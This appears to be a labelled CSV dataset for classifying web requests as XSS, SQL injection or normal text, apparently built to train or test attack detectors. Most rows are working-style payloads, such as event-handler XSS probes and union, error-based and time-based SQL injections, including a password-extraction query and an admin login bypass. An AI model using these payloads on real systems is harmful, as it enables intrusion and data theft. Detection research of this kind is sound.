"-8754"" ) ) ) union all select 7391,7391,7391,7391,7391,7391,7391--",2,SQLi,16615
-8777%' ) ) ) or ( 3934 = 2025 ) *2025 and ( ( ( '%' = ',2,SQLi,17670
"1' ) ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( 'toft' = 'toft",2,SQLi,11884
"To set them as your wallpaper, save the photo at full resolution then select wallpaper from your iPhone's Settings menu, tap ""choose a new wallpaper,"" then select the photo you saved.",3,normal,25259
"<BGSOUND SRC=""javascript:javascript:alert(1);"">",1,XSS,6093
"<script ondblclick=""alert(1)"">test</script>",1,XSS,7194
-4873' ) ) ) or 3038 = 3038,2,SQLi,20915
"1 ) where 8338 = 8338 and 6055 = ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10463
Where's the zoo?,3,normal,23518
"1' in boolean mode ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) #",2,SQLi,11017
"<div draggable=""true"" contenteditable>drag me</div><html ondragover=alert(1) contenteditable>drop here</html>",1,XSS,1079
Where's the park?,3,normal,23537
<blockquote onpointerenter=alert(1)>XSS</blockquote>,1,XSS,5108
To purchase an item select the Add To Shopping Basket icon for the...,3,normal,25264
"<A HREF=""""></A>",1,XSS,7616
"From the top toolbar select ""Tools"" and then select ""Effects and Filters"" from the drop down menu.",3,normal,26160
( select chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7812 = 7812 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) from dual ),2,SQLi,10971
"1"" ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13143
Specify criteria where applicable.,3,normal,23357
"<var onmouseover=""prompt(1)"">On Mouse Over</var>?",1,XSS,5838
"select * from users where id = 1 *\ union select null,@@VERSION -- 1",2,SQLi,16363
1' ) where 3311 = 3311,2,SQLi,21502
"select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 and 'qjle' = 'qjle",2,SQLi,13912
1 ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 6406 = 6406,2,SQLi,12872
"-8491"" where 9043 = 9043 union all select 9043,9043,9043,9043,9043,9043,9043,9043,9043--",2,SQLi,14798
"<code oncut=""alert(1)"" contenteditable>test</code>",1,XSS,5578
select ( case when ( 9343 = 9513 ) then 1 else 9343* ( select 9343 from master..sysdatabases ) end ) --,2,SQLi,13990
"Iâll select an area in the GeoMapApp, I save it as a JPEG, and then I can select it and copy it and paste it in, and I can rotate and deform it a little bit.",3,normal,26067
"<big draggable=""true"" ondragstart=""alert(1)"">test</big>",1,XSS,4512
"<svg oncopy=""alert(1)"" contenteditable>test</svg>",1,XSS,5750
"1%"" ) ) ) and 6055 = ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( ""%"" = """,2,SQLi,10378
"{""id"":null,""firstName"":""Sheryl"",""lastName"":""Lee"",""address"":""90177 N 55th Ave"",""city"":""407"",""telephone"":""5997060564""}",3,normal,27276
"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ""%"" = """,2,SQLi,13558
"1%"" and 4595 = 4595#",2,SQLi,21797
How do you select the works you plan to remake?,3,normal,26083
"1' in boolean mode ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) #",2,SQLi,12651
"-4473' ) union all select 7656,7656#",2,SQLi,19997
"( select 1 from generate_series ( 9352,9352,case when ( 9352 = 9352 ) then 1 else 0 end ) limit 1 )",2,SQLi,14169
"<nextid onclick=""alert(1)"">test</nextid>",1,XSS,7845
"Select the ""Mute"" option at the very top of the next page, and select how long you'd like to keep the server muted for.",3,normal,25606
"<base draggable=""true"" ondragend=""alert(1)"">test</base>",1,XSS,4541
"The Israelites were commanded to select on the tenth of Abib (Nisan) a he-lamb of the first year, without blemish, to kill it on the eve of the fourteenth and to sprinkle with its blood the lintel and sidepost of the doors of their dwellings so that the Lord should ""pass over"" them when he went forth to slay the first-born of the Egyptians.",3,normal,25426
"<tfoot onclick=""alert(1)"">test</tfoot>",1,XSS,8319
1' ) where 7903 = 7903,2,SQLi,21526
1%' and 6454 = 8348 and '%' = ',2,SQLi,20459
"<svg oncontextmenu=""alert(1)"">test</svg>",1,XSS,7939
I'm thinking of where to spend my evening.,3,normal,23719
"<bgsound onmouseout=""alert(1)"">test</bgsound>",1,XSS,6718
"1"" ) ) as zbfj where 2285 = 2285",2,SQLi,20325
<form onpointerout=alert(1)>XSS</form>,1,XSS,8334
Select shop.,3,normal,24553
"<div draggable=""true"" contenteditable>drag me</div><output ondrop=alert(1) contenteditable>drop here</output>",1,XSS,1080
"<DIV STYLE=\""width: expression(alert('XSS'));\"">",1,XSS,3805
AND 7506=9091 AND (5913=5913,2,SQLi,20788
"<style></style\x3E<img src=""about:blank"" onerror=javascript:alert(1)//></style>",1,XSS,2006
"1%"" and elt ( 1210 = 1210,sleep ( 5 ) ) and ""%"" = """,2,SQLi,18383
1' where 5547 = 5547,2,SQLi,21888
"{""id"":null,""firstName"":""Ã¥ÿââ¬âæúÃÂ"",""lastName"":""Ã¥ÿââ¬âæúÃÂ"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27045
1 and 9198 = 9198--,2,SQLi,21981
The XLE is the Energy Select Sector SPDR Fund ETF.,3,normal,25359
"1' ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( 'drvk' like 'drvk",2,SQLi,10543
"<SCRIPT ="">"" SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,6390
Select your image.,3,normal,24896
"iif ( 8770 = 9611,1,1/0 )",2,SQLi,21102
"`""'><img src=xxx:x onerror\x09=javascript:alert(1)>",1,XSS,5333
"<style>@keyframes x{}</style><param style=""animation-name:x"" onanimationstart=""alert(1)""></param>",1,XSS,1542
"1 ) as jvuo where 6859 = 6859 union all select null,null,null,null,null,null,null#",2,SQLi,15109
"{""id"":null,""name"":""CharizardMega Charizard X""}",3,normal,27193
<wbr onpointerup=alert(1)>XSS</wbr>,1,XSS,9062
"-4929"" where 6381 = 6381 or 8571 = 8571--",2,SQLi,19435
"<isindex onmousemove=""alert(1)"">test</isindex>",1,XSS,6379
<ruby id=x tabindex=1 ondeactivate=alert(1)></ruby><input id=y autofocus>,1,XSS,2321
"<font onmouseleave=""alert(1)"">test</font>",1,XSS,7725
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337,2,SQLi,16558
"Crate & Barrel: Up to 50% off outdoor furniture, 40% off select outdoor entertaining, 20% off select bedding, mattresses and box springs.",3,normal,26265
"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3--",2,SQLi,14452
"1 ) ) and elt ( 4249 = 4249,7259 ) and ( ( 5683 = 5683",2,SQLi,18025
"<optgroup draggable=""true"" ondrag=""alert(1)"">test</optgroup>",1,XSS,3498
"1 ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( 4003 = 4003",2,SQLi,10889
"{""id"":null,""firstName"":""Goh"",""lastName"":""Katherine"",""address"":""32820 Corkwood Rd"",""city"":""573"",""telephone"":""5621469576""}",3,normal,27594
1' where 9024 = 9024 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --,2,SQLi,15304
"<FRAMESET><FRAME SRC=\""javascript:alert('XSS');\""></FRAMESET>",1,XSS,3266
-2891 where 1770 = 1770 or 9290 = 5866,2,SQLi,19691
select case when 9390 = 5752 then 1 else null end--,2,SQLi,18307
"-1447"" union all select 3013,3013,3013,3013,3013,3013,3013--",2,SQLi,17202
"-4381 or make_set ( 6118 = 3095,3095 ) # lkcr",2,SQLi,19056
"Select a categoryâin this case, ""Check-in & Redemption Issues"" is most relevantâand then select a question.",3,normal,25668
"<textarea onmouseover=""alert(1)"">test</textarea>",1,XSS,6070
Select inspire.,3,normal,24736
"Since that time select Japanese species, chosen for superior milling qualities, have been widely introduced, as the market prejudice in favour of head rice made the large percentage of broken rice a heavy handicap to the farmers.",3,normal,25549
><img src=x onerror=javascript:alert('1')>,1,XSS,7325
<div id=x tabindex=1 onbeforeactivate=alert(1)></div>,1,XSS,5044
"-4285' ) ) ) union all select 8819,8819,8819,8819,8819,8819,8819,8819#",2,SQLi,16195
Filter the spam messages from your inbox.,3,normal,22913
Head Full of Honey is in select theaters Nov. 30.,3,normal,26111
"-3719"" union all select 6609,6609,6609,6609#",2,SQLi,19112
-2351 ) ) as xdqn where 4019 = 4019 or 8571 = 8571--,2,SQLi,18177
"-7485"" ) ) as caob where 4100 = 4100 union all select 4100,4100,4100,4100,4100,4100,4100,4100--",2,SQLi,14394
"<select draggable=""true"" ondragstart=""alert(1)"">test</select>",1,XSS,3316
"<thead onmouseleave=""alert(1)"">test</thead>",1,XSS,7261
"<output onmouseover=""alert(1)"">test</output>",1,XSS,7006
"{""id"":null,""name"":""RotomMow Rotom""}",3,normal,27385
"ABC<div style=""x:\xE2\x80\x83expression(javascript:alert(1)"">DEF",1,XSS,2866
<table onfocusout=alert(1) tabindex=1 id=x></table><input autofocus>,1,XSS,2642
Where's the nail salon?,3,normal,23622
1' ) where 5378 = 5378,2,SQLi,21413
"1%' ) ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14864
1 where 2672 = 2672 and 1819 = 4322#,2,SQLi,19978
-5211 union all select 1754--,2,SQLi,20721
"If you want to select certain contacts to download, hover your cursor over their name and tick the box that appears; otherwise, in the left sidebar, select ""Export.""",3,normal,26045
"<IMG SRC=x onmouseout=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3263
"1' ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and 'nwdk' like 'nwdk",2,SQLi,10460
<s id=x tabindex=1 ondeactivate=alert(1)></s><input id=y autofocus>,1,XSS,2678
"<source onpaste=""alert(1)"" contenteditable>test</source>",1,XSS,4311
<b <script>alert(1)</script>0,1,XSS,9580
"Leesa offers a ""white glove"" delivery service in select locations.",3,normal,25915
To browse the repository select Browse from the navigation bar on the left of the screen.,3,normal,25286
"<col onmouseover=""alert(1)"">test</col>",1,XSS,8410
"<style>@keyframes slidein {}</style><title style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></title>",1,XSS,381
-6190' ) where 2621 = 2621 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,9999
1%' ) and 2006 = 2006,2,SQLi,21681
"1 ) union all select null,null,null,null,null,null,null--",2,SQLi,17545
1 ) ) as xbii where 2262 = 2262 or sleep ( 5 ) --,2,SQLi,18607
<embed id=x tabindex=1 onactivate=alert(1)></embed>,1,XSS,5462
"-4259' ) ) as usqu where 5419 = 5419 or elt ( 8325 = 8837,8837 ) --",2,SQLi,16530
Select your influence.,3,normal,24878
"1"" ) as nyzd where 5305 = 5305",2,SQLi,20580
"1' ) ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16078
<table onpointermove=alert(1)>XSS</table>,1,XSS,7789
"<figure onbeforecut=""alert(1)"" contenteditable>test</figure>",1,XSS,3461
1 where 4245 = 4245,2,SQLi,21973
-9005 union all select 4410#,2,SQLi,20833
<basefont id=x tabindex=1 onfocusin=alert(1)></basefont>,1,XSS,4353
1'+ ( select echl where 6593 = 6593 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,14485
"1 ) ) ) union all select null,null--",2,SQLi,20000
"<applet draggable=""true"" ondragend=""alert(1)"">test</applet>",1,XSS,3651
I'll select a gift for my cousin's birthday.,3,normal,23708
select ( case when ( 4996 = 1734 ) then 1 else 4996* ( select 4996 from master..sysdatabases ) end ) --,2,SQLi,13983
"<menu ondblclick=""alert(1)"">test</menu>",1,XSS,8116
"ORDER BY 1,SLEEP(5),3--",2,SQLi,21266
"1' ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( 'ayqn' like 'ayqn",2,SQLi,12217
"1 ) ) as faxr where 7972 = 7972 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12400
"<menuitem draggable=""true"" ondragend=""alert(1)"">test</menuitem>",1,XSS,3093
"<TABLE><TD BACKGROUND=""javascript:javascript:alert(1)"">",1,XSS,4421
"<textarea draggable=""true"" ondragstart=""alert(1)"">test</textarea>",1,XSS,2804
Filter the search results for relevant information.,3,normal,22952
1' ) where 5279 = 5279 or sleep ( 5 ) #,2,SQLi,19616
"1"" ) ) as qode where 2398 = 2398 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,12163
"1' ) ) ) or 9643 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( 'qvqf' = 'qvqf",2,SQLi,12580
<form onpointerup=alert(1)>XSS</form>,1,XSS,8727
"-7337"" union all select 7294,7294,7294,7294,7294,7294,7294,7294,7294,7294--",2,SQLi,15608
"<div draggable=""true"" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a>",1,XSS,1323
<bdo onfocusout=alert(1) tabindex=1 id=x></bdo><input autofocus>,1,XSS,2909
"<style draggable=""true"" ondragend=""alert(1)"">test</style>",1,XSS,4130
<li onpointerout=alert(1)>XSS</li>,1,XSS,9229
"-9111"" or 3038 = 3038",2,SQLi,21685
"1"" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""fqeu"" like ""fqeu",2,SQLi,14184
"{""id"":null,""firstName"":""Fook Weng"",""lastName"":""Ow Yong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27208
"<object classid=""clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"" onqt_error=""alert(126)"" style=""behavior:url(#x);""><param name=postdomevents /></object>//[""'`-->]]>]</div>",1,XSS,346
end and ( ( ( 'hglq' like 'hglq,2,SQLi,20413
<script onreadystatechange=alert(1)></script>,1,XSS,6607
"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))",2,SQLi,13481
<nav id=x tabindex=1 onfocusin=alert(1)></nav>,1,XSS,6494
"1' ) ) and elt ( 6847 = 5874,5874 ) and ( ( 'yspu' = 'yspu",2,SQLi,17375
"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( 'cogk' = 'cogk",2,SQLi,10738
<nextid id=x tabindex=1 onactivate=alert(1)></nextid>,1,XSS,4967
"<a href=""%0aalert(1)"" onclick=""protocol='javascript'"">test</a>",1,XSS,3124
"<style>@keyframes x{}</style><dl style=""animation-name:x"" onanimationend=""alert(1)""></dl>",1,XSS,1773
"<p onclick=""alert(1)"">test</p>",1,XSS,9542
"<style>:target {color: red;}</style><fieldset id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></fieldset>",1,XSS,742
"{""id"":null,""firstName"":""Juay"",""lastName"":""Yew Hai"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27564
"<style>@keyframes slidein {}</style><bdi style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></bdi>",1,XSS,422
"1 or 9643 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) # bzoq",2,SQLi,13722
"AND ELT(1337=1337,SLEEP(5)) AND 1337"" LIKE ""1337",2,SQLi,18662
<img onload=alert(1)>//INJECTX,1,XSS,9574
"It is evident that accurate knowledge of the character and structure of the rock-formations in petroliferous territories is of the greatest importance in enabling the expert to select favourable sites for drilling operations; hence on well-conducted petroleumproperties it is now customary to note the character and thickness of the strata perforated by the drill, so that a complete section may be prepared from the recorded data.",3,normal,25972
1 WAITFOR DELAY '0:0:5'--,2,SQLi,21035
"-8538"" or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,10893
") and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,19561
-4803%' ) ) or 8571 = 8571--,2,SQLi,20831
"<base onkeypress=""alert(1)"" contenteditable>test</base>",1,XSS,4570
"waitfor delay '0:0:5' and ( ( ""%"" = """,2,SQLi,19907
"-8919"" or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""nstr"" = ""nstr",2,SQLi,10311
-1252' ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'pzxh' like 'pzxh,2,SQLi,10152
She'll select the dessert.,3,normal,24452
"The Consumer Staples Select Sector SPDR ETF (XLP) and the Utilities Select Sector SPDR ETF (XLU) are up 5.95 percent and 1.63 percent, respectively, since Oct. 1.",3,normal,25472
"-3420 where 9681 = 9681 or make_set ( 2438 = 1977,1977 ) --",2,SQLi,17274
"<area oncopy=""alert(1)"" contenteditable>test</area>",1,XSS,5420
"1"" ) where 7165 = 7165 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,15493
"<em onmousemove=""alert(1)"">test</em>",1,XSS,8940
"<style>@keyframes x{}</style><big style=""animation-name:x"" onanimationend=""alert(1)""></big>",1,XSS,1714
1 ) ) as vryv where 5600 = 5600,2,SQLi,20432
"<INPUT TYPE=""IMAGE"" SRC=""javascript:javascript:alert(1);"">",1,XSS,3797
"-8929%' ) union all select 9486,9486,9486,9486#",2,SQLi,18829
"<menuitem oncut=""alert(1)"" contenteditable>test</menuitem>",1,XSS,3887
"<td ondblclick=""alert(1)"">test</td>",1,XSS,9055
<legend id=x tabindex=1 onfocus=alert(1)></legend>,1,XSS,5687
<listing id=x tabindex=1 onfocusin=alert(1)></listing>,1,XSS,4744
"<rt onbeforepaste=""alert(1)"" contenteditable>test</rt>",1,XSS,4673
"-4932%"" ) ) or ( 3076 = 5927 ) *5927 and ( ( ""%"" = """,2,SQLi,18230
"Select from steak, seafood, chicken or enjoy freshly prepared sushi.",3,normal,25632
Consumers in rural areas should either select a 2.4 Ghz or 5.8 Ghz phone because rarely will you need to worry about interference or someone listening to your call.,3,normal,26274
"-3250%"" union all select 7162,7162,7162,7162,7162,7162,7162,7162,7162--",2,SQLi,16097
"1' where 6963 = 6963 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11831
Calculate sums where needed.,3,normal,23260
I select.,3,normal,24454
"1%' ) ) ) union all select null,null,null,null,null,null,null#",2,SQLi,16938
<isindex id=x tabindex=1 onbeforeactivate=alert(1)></isindex>,1,XSS,3338
"admin""or 1=1 or """"=""",2,SQLi,21718
-4892%' ) ) or 2251 = 9881--,2,SQLi,20797
1' rlike ( select ( case when ( 1916 = 7874 ) then 1 else 0x28 end ) ) and 'ughq' = 'ughq,2,SQLi,14759
<base onblur=alert(1) tabindex=1 id=x></base><input autofocus>,1,XSS,3195
"<ruby onclick=""alert(1)"">test</ruby>",1,XSS,8835
"1%"" ) ) and 8316 = 6410#",2,SQLi,21214
1%' ) ) and 9198 = 9198--,2,SQLi,21074
"Finally, select that you're interested in dry ice to get the stores that will best cater to your needs.",3,normal,26200
"1%' ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( '%' = '",2,SQLi,12615
"<script src=""javascript:alert(3)""></script> // IE6, O11.01â, OM10.1â//[""'`-->]]>]</div>",1,XSS,1840
"{""id"":null,""firstName"":""Judy"",""lastName"":""Tan"",""address"":""201 Hawk Ct"",""city"":""800"",""telephone"":""5126114889""}",3,normal,26963
"{""id"":null,""firstName"":""Rahiman"",""lastName"":""Ibrahim"",""address"":""#02-266, 2019 Bukit Batok Street 23"",""city"":""440"",""telephone"":""3504787265""}",3,normal,27120
"<ruby ondblclick=""alert(1)"">test</ruby>",1,XSS,8199
"<math><a xlink:href=//"">click",1,XSS,5859
"<style>:target {transform: rotate(180deg);}</style><rt id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></rt>",1,XSS,699
"<img onpaste=""alert(1)"" contenteditable>test</img>",1,XSS,5556
"1%"" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ""%"" = """,2,SQLi,12995
"-5205' ) ) union all select 8592,8592,8592,8592,8592,8592--",2,SQLi,17261
"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><select id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></select>",1,XSS,179
"<area onmousemove=""alert(1)"">test</area>",1,XSS,8054
"1' ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( 'cqrp' = 'cqrp",2,SQLi,12861
<link onfocusout=alert(1) tabindex=1 id=x></link><input autofocus>,1,XSS,2728
"0\""autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>""-confirm(3)-""",1,XSS,2119
1'|| ( select 'yhpe' where 8010 = 8010 rlike ( select ( case when ( 7910 = 3752 ) then 1 else 0x28 end ) ) ) ||',2,SQLi,13510
<aside onfocusout=alert(1) tabindex=1 id=x></aside><input autofocus>,1,XSS,2636
Where's the yoga class?,3,normal,23659
"1"" waitfor delay '0:0:5'",2,SQLi,21223
"-8655 ) where 3910 = 3910 union all select 3910,3910#",2,SQLi,18111
"1"" ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( ""epwi"" like ""epwi",2,SQLi,11314
<strike id=x tabindex=1 onbeforeactivate=alert(1)></strike>,1,XSS,3706
"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 6 ) ) AND 'i' = 'i",2,SQLi,11627
"1"" where 8234 = 8234",2,SQLi,21862
"<button draggable=""true"" ondragstart=""alert(1)"">test</button>",1,XSS,3380
Delete the irrelevant comments.,3,normal,22677
"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--",2,SQLi,14666
"<shadow onmousemove=""alert(1)"">test</shadow>",1,XSS,6838
begin if ( 5624 = 5624 ) then dbms_lock.sleep ( 5 ),2,SQLi,18313
"1'|| ( select 'nbmo' from dual where 5572 = 5572 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13158
"<frame onmouseleave=""alert(1)"">test</frame>",1,XSS,7171
That additional money goes to select charities supported by the company.,3,normal,25499
1%' ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( '%' = ',2,SQLi,10569
if ( 5896 = 4251 ) select 5896 else drop function xmyk--,2,SQLi,17620
<sub id=x tabindex=1 onbeforeactivate=alert(1)></sub>,1,XSS,4968
"<style>:target {color:red;}</style><hgroup id=x style=""transition:color 1s"" ontransitionend=alert(1)></hgroup>",1,XSS,1014
ORDER BY 3#,2,SQLi,22361
"1"" ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15806
"1234 ' AND 1 = 0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",2,SQLi,15482
"<spacer onmousemove=""alert(1)"">test</spacer>",1,XSS,6874
select ( case when ( 6002 = 9048 ) then 6002 else 6002* ( select 6002 from mysql.db ) end ) #,2,SQLi,14533
"-8200' in boolean mode ) union all select 3360,3360--",2,SQLi,18135
"<content onkeydown=""alert(1)"" contenteditable>test</content>",1,XSS,3475
"1"" ) as yecj where 1194 = 1194 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14023
Where's your SQL project?,3,normal,23427
"1' ) where 3375 = 3375 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12654
"If you touch and hold your finger on a space where text can occupy, you'll see options to Select and Select All.",3,normal,26049
"<article onmousemove=""alert(1)"">test</article>",1,XSS,6336
"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( '%' = '",2,SQLi,12323
1' or sleep ( 5 ) #,2,SQLi,21947
admin' ) or '1' = '1'--,2,SQLi,21277
"<tr draggable=""true"" ondragstart=""alert(1)"">test</tr>",1,XSS,4892
"1', ( select ( case when ( 8596 = 8596 ) then 1 else 8596* ( select 8596 from mysql.db ) end ) )",2,SQLi,14344
Select your race.,3,normal,24926
"<summary draggable=""true"" ondragleave=""alert(1)"">test</summary>",1,XSS,3026
"-9087"" order by 1#",2,SQLi,22042
"1' or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )",2,SQLi,11869
"jaVasCript:/*-/*`/*\`/*'/*""/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e",1,XSS,503
<spacer onpointerenter=alert(1)>XSS</spacer>,1,XSS,6875
"-7731"" ) ) or make_set ( 2551 = 4389,4389 ) and ( ( ""unly"" like ""unly",2,SQLi,16288
"-1963 union all select 6831,6831,6831,6831,6831,6831,6831,6831#",2,SQLi,16832
1' rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and 'hyun' like 'hyun,2,SQLi,14597
"{""id"":null,""firstName"":""Pauline"",""lastName"":""Fong"",""address"":""1 CLINTON AVE, ALBANY NY 12207"",""city"":""238"",""telephone"":""1467501124""}",3,normal,27502
"1' in boolean mode ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) #",2,SQLi,11232
"1%"" ) and make_set ( 9956 = 1060,1060 ) and ( ""%"" = """,2,SQLi,18092
